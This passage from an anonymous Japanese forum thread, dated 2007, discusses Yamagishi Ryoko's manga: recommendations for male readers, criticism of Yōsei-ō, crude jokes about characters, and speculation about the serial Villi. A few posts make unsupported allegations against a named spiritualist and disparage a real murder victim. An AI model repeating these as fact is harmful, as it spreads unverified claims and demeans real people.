そろそろテレプシ発売だっけ?今日まいあをよんだ。テレプシは現実にちかいなと思った。人間くさいというか。まいあはいい意味でバレエスポ根。

148 :雷門:2007/01/02(火) 23:10:37 ID:UKcxC3200
あのう、男性でもとっつき易い山岸凉子さんの作品をいくつか教えて
ください

149 :花と名無しさん:2007/01/02(火) 23:21:46 ID:???O
>>148
「白眼子」「負の暗示」をすすめる

150 :花と名無しさん:2007/01/03(水) 01:23:29 ID:???O
>>148
天人唐草
の男性の感想を聞きたい
オカルト好きなら、汐の声
つか、大体の作品が男性でも読みやすいと思いますが
日出る処の天子は既読かもしれませんが、
未読ならとりあえず、必読だと思います

151 :花と名無しさん:2007/01/03(水) 06:11:41 ID:???0
 |             多くん 僕は うれしい >
 |              ソ…ソウデスカ >
/ ̄ ̄ ̄ ̄ ̄

70年代後期以降の作品なら、好き嫌いは別れるかも知れませんがどれでも
なんというか、「いかにもしょーじょまんが」な路線から積極的に離れ始めた頃でしょうか?
作品だと「アラベスク」第2部の辺りから、かな
(私も男ですが、「キルケー」で完全にハマりました)
思いつくままに「ハーピー」「スピンクス」「金壺・銀鎖」「牧神の午後」「ツタンカーメン」
「鬼」「イシス」「黒のヘレネー」「時じくの香の木の実」「副馬」「妖精王」「ヤマトタケル」
「メタモルフォシス伝」「パイドパイパー」「黒鳥」「ウンディーネ」「鬼来迎」…キリがないよ('A`)
あとこのAAの元ネタの「青海波」。オリジナルは非常に清々しい小品ですので念のため


152 :ついでに:2007/01/03(水) 06:13:30 ID:???0
    夢殿
    ↓
 |                   \
 |  ('A`)           ギシギシ
/ ̄ノ( ヘヘ ̄ ̄        アンアン/
    ↑
    ウマヤド        毛人の家→

153 :花と名無しさん:2007/01/03(水) 08:30:37 ID:???0
ミスった…毛人と布都姫が結ばれたのは
司馬達等の家でした…

 |    ||              \
 |  ('A`)          ヤマヤマ
 |   ( )          ギシギシ/
 |    | |
/ ̄ ̄ ̄ ̄ l⌒l⌒l ←わざわざ読み直した
    ↑  . ⌒⌒
   >>152

154 :花と名無しさん:2007/01/03(水) 12:31:07 ID:???O
真の人で、いじらしい人であるな

155 :花と名無しさん:2007/01/03(水) 12:51:56 ID:???O
山岸漫画は、読者をかなり選ぶからなぁ
魅惑的な登場人物ばかりで陰がある
突きあうには大変だよな

156 :花と名無しさん:2007/01/03(水) 14:23:03 ID:???0
読者層、幅広そうだけどね。
女性作家にしては。

157 :花と名無しさん:2007/01/03(水) 15:08:16 ID:???O
不思議な魅力を持っているのだろうね。
なんだか、あった読者全員好きにさせるような魔力みたいなものを感じるよ。
その魅力の秘密はどこにあるのか?と想うのも一考。

158 :花と名無しさん:2007/01/03(水) 15:31:34 ID:???O
何となくだけど、
ギシ作品は、初読みが若いうちの方が、免疫がつきやすいような
自分は14歳くらいだったけど

159 :花と名無しさん:2007/01/03(水) 15:45:16 ID:???O
ふーん
ギシさんに、謎を解いてもらいたい読者は結構居ると思うけどな。
ひどい話と、操られた沢山の読者。
好きになるわきゃないと思うのだが。
世に溢れているエセものと、マスター気取りの奴ら
たったひとつの綻びから、みんな立ち上がって
悪意を淘汰する、愚者達
はじまりは終わりの鐘がなり、光が射す
誰もが悪者になどなりたくはない
悪者を押し付けるものが悪なんだよ

160 :花と名無しさん:2007/01/03(水) 17:27:03 ID:???O
絵がさっぱりしてるし>>151の挙げたようなストーリー重視の短篇群は
男性もきっとおもしろいと思う


161 :花と名無しさん:2007/01/03(水) 17:39:57 ID:???O
>>157
やっぱり私にとっては絵だなあ。魅力のありか。
すごい絵描きさんだと思うよ。
バレエの人物、舞台。美人の美しさ妖しさ。
動物なら馬と鳥。

162 :花と名無しさん:2007/01/03(水) 18:04:52 ID:???0
このスレを見ている人はこんなスレも見ています。(ver 0.20)
日出処の天子 第二十四戦目 [懐かし漫画]
山岸バレエマンガを崇拝するところ[5巻目] [ダンス]
鄭◆チョン・ウソンpart.13◆雨盛 [海外芸能人]
山岸凉子総合 その2 [漫画]
【大河原遁】王様の仕立て屋 39着目【おひさ】 [漫画]


意外と真面目にギシ信者やってるのねw
寒流が入ってるのがオバっぽいというか…

163 :!omikuji!dama:2007/01/03(水) 22:49:20 ID:YXbqq2P60
>>148
短編なら白眼視とか負の暗示とか、、、
長編の妖精王はどうでそう?ツタンカーメンもいけると思う。

164 :花と名無しさん:2007/01/04(木) 00:20:43 ID:???O
>>163
シロさんと負の、はおすすめだけど
妖精王とツタンカーメンは作者も認める二大失敗作…

165 :花と名無しさん:2007/01/04(木) 00:28:28 ID:???0
幼生はウマーとエミーを予感させるモホー漫画として素晴しいとオモ

166 :163:2007/01/04(木) 00:58:28 ID:???0
えーそうなんですか?>>失敗作
なぜに
どっちも好きなんだけどなあ ドロドロが少なめだし
すがすがしさを感じる作品ってギシさんには珍しいというか

今日のテレビで、ツタンカーメン発掘したときのカーナボンの写真を見た
まさにジジイでした。
ギシ作品では好青年に描いてあったけど、現実は厳しい。
あれでは、母もあせって娘を遠ざけるのも無理はない。

167 :花と名無しさん:2007/01/04(木) 01:08:33 ID:???0
>>166
カーナボンはパパだよ

私もツタンカーメンが好き
イーヴリン可愛ユス

168 :163:2007/01/04(木) 01:14:02 ID:???0
作中ではイーヴリンの母が二人の雰囲気に感づいて、引き離そうとしてたでしょ
カーナボン卿は全然気がついてなかったけど

169 :花と名無しさん:2007/01/04(木) 01:33:34 ID:???O
>>166
妖精王は「妖精王は、他人の夢を聞いてもおもしろくないという感じ」と
ギシ先生が何かに載ってた対談で言ってた。
私は信者だし妖精の世界なんて
先生得意の半人半獣が出まくりなので楽しんだけど。
以下妖精王への不満タラタラ
・最初性格悪い設定だった爵がわけのわからないことになってる
・燐兄さんと爵の交流がほとんどないのでその後の結びつきに説得力がない
(爵がグィンの生まれ変わりだかなんだかで
リンは第一の従者だったんだってば、ということにはなってるけど
どうも爵自身のその自覚や記憶の描写が薄い)
・爵の個性が薄い
・たぶん主人公に成長させたり自分自身の力で戦わせなければならなかったため?
角笛が全然役にたってない。意味もあまりない。
疑うと重くなる=持つ資格がなくなるよ、というエピはあるけど
設定消化のためって感じ。
ストーリーはちゃんとできてるんだけど
セリフや独白による説明が多い。ギシ先生にしては不出来。

170 :花と名無しさん:2007/01/04(木) 01:39:58 ID:???0
妖精王はRPGをマンガで読むような感じだったな

171 :花と名無しさん:2007/01/04(木) 01:42:29 ID:???O
妖精王は、長編ファンタジーが苦手な自分、
というのを再確認できた作品
山岸作品なら大丈夫かと思ったんだけど…

172 :花と名無しさん:2007/01/04(木) 07:10:24 ID:???0
妖精王はファンタジー好きを再認識できた作品だった。

このスレを見ている人は・・・にエコールが入ってる!なんか嬉しい
あんまり繋がりなさそうだけどな。

173 :花と名無しさん:2007/01/04(木) 08:27:04 ID:???0
妖精王はいろんな意味で中途半端だと思った
私は「星を帯し者」のイラストと挿絵がすきだな
ハヤカワ文庫の中で天野喜孝のエルリックサーガと山岸凉子の星を帯し者が一番イイ!と思う

174 :花と名無しさん:2007/01/04(木) 10:38:05 ID:???0
「妖精王」はドラクエもアップル版ウィズもなく、D&Dの邦訳もなく、
ヒロイックファンタジーがSFよりマイナーなジャンルだった時代に、
しかも少女漫画誌に連載された、ってだけで
十分な「意欲作」だったと思いますが。作品としての成功、失敗という結果論は別にして。
確かに消化不良な部分は多いし、今現在のファンタジー物と比べると辛いものはあります。

しかし、クイーン=マブ以上のエ…いやイロ気を持った女性キャラには、このジャンルではいまだお目にかかれない。
カワイイ系はともかく、「オンナ」としての魅力ではベルセルクのスランも負けている。

それとセリフやナレーションが説明的なのは、山岸作品の大半で感じますね。
言い方を代えれば理屈っぽい。まあ自分は理屈っぽい漫画が好き(と言うより、そういう漫画でないとあまり楽しめない)なイヤな性格の持ち主ですので('A`)

 |    ||
 |  ('A`)              \
 |   ( )           ギシギシ
 |    | |           アンアン/
/ ̄ ̄ ̄ ̄
    ↑           水鏡→
    グィン





175 :花と名無しさん:2007/01/04(木) 11:37:41 ID:???0
セリフ、ナレーションが説明的であることと理屈っぽいこととは同じではないと思われ。
山岸作品で説明的な部分は、それまでのストーリーや絵で説明しきれない部分の補足じゃないか?
理屈っぽいとはとても思わんが。

妖精王については、爵やプックの世界にイヒカとかクイーンマブとかメリジェーヌが
浸入してきてしまう(ストーリー的には爵が侵入者なわけだが)ことが、
妖しくも怖ろしい魅力になっていると思う。
多分、そこがつぎはぎ世界になってしまった原因かもしれないとも思うが。

176 :花と名無しさん:2007/01/04(木) 11:46:16 ID:???O
とりあえず、シュリンクス
ぼくとダンスを踊ろう

177 :花と名無しさん:2007/01/04(木) 13:31:38 ID:???O
ええ?きみ
そんなのが存在するのかい?
りょうこ先生、大喜びだな
夢のおわりは果てないな

178 :花と名無しさん:2007/01/04(木) 14:13:25 ID:???0
>>175
>妖しくも怖ろしい魅力になっていると思う。
哀しい、も入れれ

179 :花と名無しさん:2007/01/04(木) 16:50:12 ID:???O
途中で疲れとか飽きが見える気がするよ>妖精王
絵はすんばらしいし海蛇姉さんやナメクジおばさんのエピは
いかにもギシ先生で、ファンはうれしいけど。


180 :花と名無しさん:2007/01/04(木) 16:54:43 ID:???0
イヒカとマブは本当にセックルしてたのだろうか。

とりあえずケルピーはセックルしたくてたまんねーだったけど
力が無くなっていない事からとするとお預けくらってる貢君なんだろうな。

181 :花と名無しさん:2007/01/04(木) 17:46:55 ID:???0
ベッドには一緒に入ったかもしれないけど、多分してないでしょうね。
でなきゃクーフーリンに化ける力も取られるだろうし、最後に彼と剣を交える力も、水鏡の像を本物に戻す力も残ってなかったはず。
絵では上半身しか見えませんが、交わってるように映る幻術でも使ってたのでは?
交わらなきゃいいんだからス…(あわわわ)もしくはイヒカはイ…(あわわわわわ)

182 :花と名無しさん:2007/01/04(木) 17:50:25 ID:???0
イヒカはしっぽが生えている代わりに(ry

183 :花と名無しさん:2007/01/04(木) 18:19:22 ID:???0
寝ると力を取られるんだとしたら、グィンもあぶねーじゃん。
マブのほうで力が加減できるんでね?
あるいはグィンほどにもなれば大丈夫なのか?

184 :花と名無しさん:2007/01/04(木) 20:48:55 ID:???0
マブって処女じゃないよね。グィンがあぼんした理由のひとつも…w

185 :花と名無しさん:2007/01/04(木) 20:50:35 ID:???0
ケルピーとセックルって大変な事に…

186 :花と名無しさん:2007/01/04(木) 21:13:13 ID:???0
ギシギシ
アンアン

187 :花と名無しさん:2007/01/04(木) 23:15:59 ID:???0
井冰漉とセックスしてるマブはどう見ても処女じゃなかった。
熟れ熟れの10年前の杉本彩みたいな肉体(ししおき)だぞ。ほい。

友に裏切られたグィンより以前に、花婿を裏切ったマブになんで
天誅が下らないのか不思議。

188 :花と名無しさん:2007/01/05(金) 00:58:13 ID:???0
ししおき=肉置って肉付きのことじゃなかったっけ。
肉体でも意味通るかでも

189 :花と名無しさん:2007/01/05(金) 03:08:53 ID:???0
>187
腰の辺りの肉置が豊かで、乳房には女ざかりの凝脂が照っているんだな。

190 :花と名無しさん:2007/01/05(金) 03:14:35 ID:???O
愛して欲しい人に愛されないのがダークエルフの宿命だったっけ?
そりゃ自棄になるわな。

イヒカはやっちゃっても少し力が残っているというのが
マブの異母弟にしてダークエルフの王の血をひく大物(?)っぽくていいと思ったが。

191 :花と名無しさん:2007/01/05(金) 10:15:46 ID:???O
10年前の杉本彩ってあんた

192 :花と名無しさん:2007/01/05(金) 12:04:00 ID:???O
ギシさくひんをこどものときからよんでいて
どういったせいしんこうぞうになるのか
ははは
ぴとっ
ってくっつきたい依存度がたかいこどもたちができたのかな

193 :花と名無しさん:2007/01/05(金) 14:11:47 ID:???0
早売りマダー?

194 :花と名無しさん:2007/01/05(金) 16:25:57 ID:???O
思ったんだが、まわりは誰も知らない気づかない
失礼
年代ギシ読者で、ひとりだけ知っている場合
そのひとりは、何もいわないまま青春を過ごすことになる

知ってる人に出合うと嬉々として喜んだと思うが
残念ながら、誰も居なかった場合
ただ淡々と、物語を読む人になってしまって
それはそれは、虚しいものだっただろう

ネットが普及し、世界中とコンタクト出来る世の中になったからこそ
登場人物のようには、なってほしくないものだな
本の魔力っていうのは、確かに存在し
勇気を出さなければ、本の通りになってしまう

ま、表現者達はこの壁を壊しつつ、微妙に修正をくわえ
バッドエンドを回避していた

195 :花と名無しさん:2007/01/05(金) 18:35:55 ID:???O
りぼんから出て花ゆめとかだから
フツーにクラスでみんなで読んでたんだけど

196 :花と名無しさん:2007/01/05(金) 23:20:07 ID:???O
>>195
それは幸せだったな
俺の回りじゃ誰も読んでなかったよ

197 :花と名無しさん:2007/01/05(金) 23:32:29 ID:???0
>>187

マブは「先に裏切ったののはグィン」と言っておる。

グィンはロリ。
マブの熟れ熟れの肉体には反応できなかったんだよ。
きっと。

198 :花と名無しさん:2007/01/06(土) 00:03:55 ID:2DjwmA0rO
いんや、マブの肉体を見ればわかるがとっくにやってたさ。
ケイローンとか件とか、メリジェーヌとレズプレイとか、
冬将軍って誰だっけ?
みんなマブの穴兄弟。

199 :花と名無しさん:2007/01/06(土) 00:16:02 ID:???0
ダヴィンチゲト

200 :花と名無しさん:2007/01/06(土) 00:57:59 ID:???0
>>199

まじでか?
バレ頼む!!!!

201 :花と名無しさん:2007/01/06(土) 01:03:39 ID:???0
>>199
おめーのせいで売ってるのかと思ってツタヤまで走っちゃったじゃねーか

202 :花と名無しさん:2007/01/06(土) 02:05:19 ID:???O
ネタバレ


舞は拒食症
で、ヅカ志望

てかヅカってwww
やっぱこのスレ見てるのかしら?
それかこのスレのオバチャン程度の発想力しか無くなっちゃったのかなあ。

203 :花と名無しさん:2007/01/06(土) 02:39:13 ID:???O
>>202
ネタバレありがと
しかし、2行で終わるような中身なのか…

204 :花と名無しさん:2007/01/06(土) 02:45:13 ID:???O
>>196
男性で、他の人と語りたいほど傾倒してる時期があったりしたら
つらかったかもなあ。


205 :花と名無しさん:2007/01/06(土) 03:55:55 ID:???0
>202
そんなんならバレエから離れたのが読みたかったよ…
せっかく久しぶりの短編なのに。

206 :花と名無しさん:2007/01/06(土) 11:49:40 ID:???O
神様

民にネタを与える

民喜ぶ

民が下民にネタを与える

下民喜ぶ

下民が非人にネタを与える

非人喜ぶ

除外されてる優しい悪魔

神様にネタを与える
これが永久機関の謎解きだよな

207 :花と名無しさん:2007/01/06(土) 14:23:53 ID:???0
すげえ。短編大反響だねえwww

208 :花と名無しさん:2007/01/06(土) 17:03:27 ID:4YrjHdSqO
テレプシコーラの一巻買ったよ
いつホラーらしくなるのか楽しいみです

209 :花と名無しさん:2007/01/06(土) 17:39:22 ID:???O
九巻までダラダラしてるのが、十巻で一気にくるから楽しみに嫁

210 :花と名無しさん:2007/01/06(土) 18:15:42 ID:???0
ホントに宝塚が出てくるとは
舞ちゃんは男役女役どっち志望なんだろか

てか今月のダビンチ、ビリより
95円のパンツのマンガに感動しちゃったよ。

211 :花と名無しさん:2007/01/06(土) 20:34:13 ID:???O
弟子も娘も逃げたくなるようなカリスマバレリーナか〜。大変かもね

212 :花と名無しさん:2007/01/07(日) 02:44:44 ID:???O
>>204
そういう意味ではない。
ギシ作品の主人公レベェルが
もしいたらどうだったのかと
思いを馳せていただきたい。

213 :花と名無しさん:2007/01/07(日) 03:10:42 ID:???O
レベェルって何語?

214 :花と名無しさん:2007/01/07(日) 09:53:56 ID:???O
あのIT社長は母親より娘狙いなのかねぇ・・・


215 :花と名無しさん:2007/01/07(日) 12:10:15 ID:???0
短期集中連載って事だから3回位で終わるのかと思ってたけど
あと1回では終わらなそう。何回の予定なのかな?
こっちが延びてテレプシ再開が遅れるなんてないよね?

216 :花と名無しさん:2007/01/07(日) 12:32:18 ID:???0
>>214
そんな気がしたねぇ。

私は前後編くらいかと高をくくってたよ(´・ω・`)

217 :花と名無しさん:2007/01/07(日) 13:34:52 ID:???0
テレプシ「第一部」完、っていうのは単行本を売るための方便という可能性も捨てきれないんだが(終わっちゃった連載は、単行本が売れなくなる)。
まあそれは別にしても、ヴィリは単行本1冊分くらいは続くでしょう。そのくらいでもテレプシに比べれば「短期」だし。


218 :花と名無しさん:2007/01/07(日) 14:20:21 ID:???0
「封印」の時のように山岸センセの興味のベクトルが変わって
途中からヅカ漫画になったりしないだろうか…ヴィリ

219 :花と名無しさん:2007/01/07(日) 14:35:03 ID:???0
いっそヅカ漫画にしちゃって空気の入れ替えで
気分一新してくれたほうがいいかも・・・


220 :花と名無しさん:2007/01/07(日) 14:58:52 ID:???0
ヅカってのは寄宿舎だから
手っ取り早くITから逃げるための手段だと思ったが違うのか
あのドレスもITが勝手に貢いだもんだとばっかり

しかし山岸先生の描く女性の盛装はいつ見てもカッコええ


221 :花と名無しさん:2007/01/07(日) 15:26:19 ID:???0
>>220
>あのドレスもITが勝手に貢いだもんだとばっかり
どう見てもそうでしょ。



自分は、バレエ一筋で追いつめられたチカやふとみへのレクイエムとして読んでいる。
今度こそ舞は「ヅカは逃げよ」なんて言われないといいなww

222 :花と名無しさん:2007/01/07(日) 17:33:53 ID:???0
しかし渋谷バラバラ事件で被害者が劇団女優してたこともあったとか
一見仲良さそうなエリート金持ち一家が妙にゆがんでるとかあるけど

母親の愛情に飢えながら自分を表現したくてしょうがなくて
コメディ舞台に立ってた双子の片割れのテンパの女の子の漫画思い出した
まあ舞台俳優とか俳優職の全員が親の愛情に飢えてたのかゴルァってなるから
あんまりあれだけど

223 :生存者の告発:2007/01/07(日) 18:47:37 ID:???O
とりあえず
「死人」について、山岸先生独自解釈があると思うのだが。

224 :花と名無しさん:2007/01/07(日) 20:21:39 ID:???0
ギシ先生の漫画には子育てが下手で、子供を追い詰める母親が
けっこう出てくるよね。むしろ素敵な母親ていう設定を
見つけるのが難しいような…(そういえば思いつかないけどいたっけ?)
人間だから完璧な親なんてそうそういないんだろうけど

特に鬼子母人の母親とか自分の親とすごく被ったりするもんで
(自分語りスマソ)そういう話は何度も何度も読んじゃう。


225 :花と名無しさん:2007/01/07(日) 20:27:08 ID:???0
十市とか、額田部は悪くない部類だと思う。

226 :花と名無しさん:2007/01/07(日) 20:47:57 ID:???0
>>225
でもあの時代の貴族は基本的に自分で子育てしないしなあ〜
額田部は王子に娘を嫁にやっちゃった時点でとりあえず見る目ない。
条件的には最高だから額の気持ちもわかるが、いい旦那にはなりそうもない。

でもオージなら飾りでもいいから妻になって見たい気もする。

227 :花と名無しさん:2007/01/07(日) 21:01:23 ID:???0
>>224
子育てが上手でハッピーなんだったら、物語にならないわけで・・・
ギシ先生の得意分野が母と娘の葛藤(とオカルト)なんです


228 :花と名無しさん:2007/01/07(日) 22:56:12 ID:???0
ヴィリでは母親が現役のバレリーナ(引退間近だけど)なのが
テレプシ千恵子と比べるとマシなところかな。
母親が自分のバレエへの思いを全部娘に託したら重荷だよね。
娘が生真面目でしかもバレエが好きだったら逃れられない。


229 :花と名無しさん:2007/01/07(日) 23:45:28 ID:6AKEdRPF0
高校以来、処天を再び購入しまた愛読書としています。
久しぶりに読んで衝撃が走りました。
私は最近、江原さん等が説いている霊的真理を理解し始めているのですが、この処天の王子と毛人はまさにこの霊的真理でいうところの
「ツイン・ソウル」にあたるんですよね。それを当時の山岸さんがご存知だった
ということに驚き!それと「カクリョウの者」(あの世の住人)という言葉など
現代ではすでに使われていない言葉もご存知だし。これは調べたなどというレベル
ではなくまさに山岸先生もなにか霊媒的能力があるとしか思えません。

230 :花と名無しさん:2007/01/07(日) 23:47:01 ID:???0
オカ板行って壺でも売ってろ

231 :花と名無しさん:2007/01/08(月) 00:30:24 ID:r8Uj4f650
>>229 アホか。現代で使われてない言葉なんぞ少し本を
読む奴なら知ってる奴がうじゃうじゃいるぞ
江原ってのがつまんない女性への暴力沙汰とか恐喝とかで
複数トラブルになってるって知ってんの?
数日の付け焼刃で簡単に覚えられるそれっぽい言葉に
一々感動してるバカを騙すのが一番の金儲けだね・・

232 :花と名無しさん:2007/01/08(月) 00:40:20 ID:???0
>>222
あの被害者は腐女子っつか、かなり痛い劇団女だと思うけど。
バイト禁止されたからってエンコウしたり、エンコウ自慢してたり。
しかもあの顔だし、色々ゆがんでてもしょうがないよ。
少なくともあの鬼子母神の妹みたいな健気で悲劇的な育てられ方は
してないと思う。ミクシ読んだ限りはふてぶてしい勘違い女だよ。

233 :花と名無しさん:2007/01/08(月) 01:33:31 ID:???O
>>212
ナンダカワカンナイ

234 :花と名無しさん:2007/01/08(月) 02:07:22 ID:???O
うん。
ちゃんと言うとね?今の漫画界は、実話ばっかりなんだよ。
モデルが知らないうちに、描かれてるって
パターンもあるんだね。
だから一部の漫画家は、焦ってるんだ。

ハードルが高いギシ初期作品は、違うと想うけどね。

235 :花と名無しさん:2007/01/08(月) 02:41:13 ID:???O
>>233
韓非子って人物知ってるかい?
時代は違えど、特異な環境に生まれ
貧乏で、なにも出来ない人の場合の心の様が
わかる人にはわかるんだよ(笑)

本当に才能あるものは、目上の者
年上のもの、金持ちの者、権力者に生まれた時から監視され
他人によって、物語を構築されていくんだ。

それがいいかどうかはわからない。
ただ、空を見るかな。
稀に、その物語を修正できる異端が出来ることもある。

ま、夢の話
大人って汚い!他人の夢を奪って
なに御大ぶってんのさ(大爆笑)とか
そこで、シュールな笑いがおきるのさ

236 :花と名無しさん:2007/01/08(月) 03:09:50 ID:???O
10巻が待ちきれなくて、
だびちんを図書館で借りてきた
うちの図書館、だびちん人気で、
過去一年分はほとんど借りられてる状態
奇跡的にゲットできて、やっとチカちゃん亡くなった回を久しぶりに読めた
ユキちゃんが見たチカちゃんの死に顔は、白いコマになってるけど
顔が写るより、インパクトを受けました

237 :花と名無しさん:2007/01/08(月) 11:22:49 ID:???O
テレプシ描いてるうちに拒食症描きたくなったのかな。
拒食症は母子関係に難あることも多い、てのとか
割と教科書的セオリーにストーリー載せるの好きそうだし。
バレエ教師は篠原母みたいな固い人より
痛い迷惑な人も多いから
それを描きたい面もあったのかなーなんて。

238 :花と名無しさん:2007/01/08(月) 11:43:09 ID:???0
>>237
何かそんな感じするよね。
これ以上他の事をテレプシに盛り込むと永遠に脱線しそうだから、
いったん第一部完で締めて、短編として違う物語にしたみたいな。

拒食症とか、バレエっ子の他の道とかという蘊蓄部分はどうでもいいから、
あの親子と愛人のドロドロ関係を期待してしまう。

239 :花と名無しさん:2007/01/08(月) 12:13:45 ID:???0
あのIT、母親経由で娘と知り合って、若い方がいいやとなったのか。
そんな経緯があったら、喉元過ぎても一生涯ドロドロな親子関係だろう…恐いな。
まだITが娘狙いとは決まってないけどさ。

240 :花と名無しさん:2007/01/08(月) 12:31:54 ID:???0
>>232
もうどんな反論もできない死者をけなして叩くあんたって・・・
怖すぎ

241 :花と名無しさん:2007/01/08(月) 13:15:26 ID:???0
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【伝統芸能】裸の男たちが棒をかつぎ無病息災・五穀豊穣祈る稲荷(いなり)神社「裸参り」−青森 [芸スポ速報+]
【無垢なる】エコール2【少女たち】 [映画作品・人]
山岸バレエマンガを崇拝するところ[5巻目] [ダンス]
山岸凉子総合 その2 [漫画]
宮崎あおい そのジャングルポケット122号 [芸能]



( ´_ゝ`)フーン

242 :花と名無しさん:2007/01/08(月) 14:02:19 ID:???O
すご…裸の男とロリと宮崎あおい……

243 :花と名無しさん:2007/01/08(月) 14:51:15 ID:UAEZ+OQr0
娘のヅカ志望は、単なる「バレエからの逃げ」かと思ったのだけど、
このスレ見て、いろんな見方ができるんだなと感心。

244 :花と名無しさん:2007/01/08(月) 15:06:20 ID:???0
うーん、ストーリーがどう転んでも暗そうな結末を予感してしまう。
閉塞感でいっぱい、救いが見えない。


245 :花と名無しさん:2007/01/08(月) 15:07:48 ID:???0
「愛とは許すこと」って聞いて、「SWAN」の真澄の解釈した白鳥を思い出した。
どーでもいいけどw

246 :花と名無しさん:2007/01/08(月) 23:15:16 ID:???0
「許す」なんて価値観に憧憬感じない・・・
アホかって思う。憎んでるほうがマシ。

247 :花と名無しさん:2007/01/09(火) 00:00:42 ID:???O
わがままは男の罪 それを許さないのは女の罪

て歌を思い出した。これも大概な歌詞だよね

248 :花と名無しさん:2007/01/09(火) 00:02:03 ID:???0
キリスト的宗教観かもね。
男(アルブレヒト〜バレエの劇作家?)の都合のいい妄想の気もするけど。


249 :花と名無しさん:2007/01/09(火) 00:39:07 ID:???0
木綿のハンカチーフも大概な歌詞だよ。

1 君を捨てて東京に行くボクを許して
  いいえ都会に染まらないで帰ってくれればいいの
2 もうちょっとこっちにいる 会えないけど指輪送るからそれで我慢して
  いいえそんなの要らないから早く帰って来て
3 元気?相変わらず?今度イケテルスーツ着た画像送るから惚れ直すなよ?
  いいえ田舎もんだったあなたが好きだったの
4 えっと…もう帰るつもりないから こっちも忘れるからお前も忘れてよ
  あなた最後のわがまま 泣いて忘れるから木綿のハンカチーフ下さい

250 :花と名無しさん:2007/01/09(火) 01:20:31 ID:???O
テレビで島田紳助あたりがいう「やんちゃ」という言葉、嫌い。
男の「やんちゃ」を女は優しく受け入れて当たり前みたいな。
逆になったら自分は受け入れられるのか?
できなかったら只のエゴじゃん。
「イジメ」と一緒で、言葉のまやかしだと思う。

ITや表現者・親のエゴを、
どう冷徹に料理してくれるのか楽しみではあるけど、
この連載、テレプシコミクスに収録されるのかな?
チカ死亡の後にこの話は正直重そう…

251 :花と名無しさん:2007/01/09(火) 01:42:23 ID:???0
>>249
あの歌詞には元ネタがあるんだよ。
ボブ・ディランの「スペイン革のブーツ」
このふたつのキーワードでググるとよろし。

252 :花と名無しさん:2007/01/09(火) 02:05:10 ID:???0
>>251
へー本当だ。

http://wwwb.dcns.ne.jp/~m-sasaki/songs/songs-1.html#momen

253 :花と名無しさん:2007/01/09(火) 02:27:47 ID:???0
>>217

第1部が終了してから、すでに10年以上再開見込みのない作品
(もう売った)

小説 田中芳樹『タイタニア』第1部終了:1991年
小説 氷室冴子『銀の海金の大地』第1部終了:1996年
漫画 井上和彦『スラムダンク』第1部終了:1996年

254 :花と名無しさん:2007/01/09(火) 02:54:26 ID:???O
昴の第二部にまだ期待してるんだがw

255 :花と名無しさん:2007/01/09(火) 08:35:06 ID:???0
昴は天才ネタが尽きたから無理でしょ。
作者は次にフィギュアスケートでも描くんじゃない?
初めてスケート靴履いたのに3回転ジャンプ跳べちゃうような
主人公でw

256 :花と名無しさん:2007/01/09(火) 08:56:25 ID:???0
さすがに、憎むのはやだな〜

257 :花と名無しさん:2007/01/09(火) 09:17:19 ID:???0
>>253
まだ10年たたないけど
猫十字社の幻獣の国物語も2部は出ないだろうな。

258 :花と名無しさん:2007/01/09(火) 09:57:16 ID:???0
ヴィリがバッドエンド臭がプンプンするんだけどなぁ。
あんな幸薄そうなキャラ達で円満終了なんて想像できない。
それにしてもギシはバレリーナの体重管理の話大好きだね。
あと宝塚で胴体真っ二つになった人の話思い出した。

テレプシやっぱり10巻は葬式カラーだ!

259 :花と名無しさん:2007/01/09(火) 10:25:05 ID:???O
>>255
それもう鈴木央がやってるよ

260 :花と名無しさん:2007/01/09(火) 13:37:16 ID:???0
よく知らんけど、バリバリクラシックバレエ界の人から見ると
宝塚は格下に見られるもんなの?
素人から見るとどっちもショービジネスの世界って感じだけんど。

261 :花と名無しさん:2007/01/09(火) 17:09:33 ID:???0
>>260
それぞれもちろん人によって得意分野はかなりうまいのかもしれないけど
なんていうかいろんなジャンルをカバーするので
「できてるように見せる」技術みたいなものもあるらしい。
バレエも日舞もラインダンスも歌もピアノもなんていうか
やっぱり専門にやってる人から見たら「それなり」だけど
全部「それなり」にやるのはやっぱりそれはそれですごいというか。

宝塚入りたくてバレエやる人もいるだろうし
バレエでバリバリに上を目指してる人から見たら脇道というか別世界なんじゃない?


262 :花と名無しさん:2007/01/09(火) 17:54:05 ID:???0
>>257
もう出てるよ。小説板だけど(´・ω・`)

263 :花と名無しさん:2007/01/09(火) 18:27:38 ID:???0
>>255
上原きみ子のフィギアスケートもので、主人公は四回転が必殺技だったよ。

264 :花と名無しさん:2007/01/09(火) 18:34:01 ID:???O
川原泉の銀のロマンチックもあっさりトリプルアクセルしてたな

265 :花と名無しさん:2007/01/09(火) 19:51:04 ID:???O
>>261
魔法も戦いもいける魔法戦士がいいか、
魔法だけだけどMPと賢さが高い魔法使いがいいか
という話だな。

266 :花と名無しさん:2007/01/09(火) 20:17:50 ID:Rrq/eK/X0
スラダンてあれ「一部完」だったのか知らんかった。

ヴィリ、思わせぶりに出てた舞父の話は複線なんだろうか。
あんまり長くなって欲しくないけどなあ…

267 :花と名無しさん:2007/01/09(火) 20:29:06 ID:???0
反響にお応えし、連載延長決定!
なんてことになって3年くらい連載してたらどうしよう>ヴィリ

なんでもいいからテレプシの続き読みたい

268 :花と名無しさん:2007/01/09(火) 20:30:36 ID:???0
そういえば、妖精王ってビデオアニメになってたよね。
全く知らなくて、レンタルで見かけてびっくりした。当然、借りた。

269 :花と名無しさん:2007/01/09(火) 21:11:35 ID:???0
どうでしたか>>268

270 :花と名無しさん:2007/01/09(火) 21:22:02 ID:???0
>>265一瞬スレ間違えたかと思った。


271 :花と名無しさん:2007/01/09(火) 23:41:40 ID:???0
>>260
それはあの母にしたら、
バレエのエリートが突然体操に転向したり
プリマが突然女優に転向したりするぐらいに、
衝撃なのではあるまいか

272 :花と名無しさん:2007/01/10(水) 00:00:08 ID:???0
短期連載ってテレプシに比べたら短期って事なの?

ヅカ、バレエ専門の人からしたら色物だろうけど、
バレエには背が伸びすぎて続けられなくて進む人もいるよ。

273 :花と名無しさん:2007/01/10(水) 00:29:25 ID:???0
しかし、新たな実力派と比べてのヅカ志望の子のあからさまな美少女っぷりを見てると
ヅカの方が向いている描写かと思える。歌も踊りもやってなかった黒木瞳が
募集要項にある”容姿端麗”を見て、それなら自信があると思って受けたら
受かったって言ってたもんな。
 踊りの技術より容姿の方がモノいいそうだし。
状況としては椿ちゃんと同じか。伝統芸能やってる家と歌って踊りたい娘。

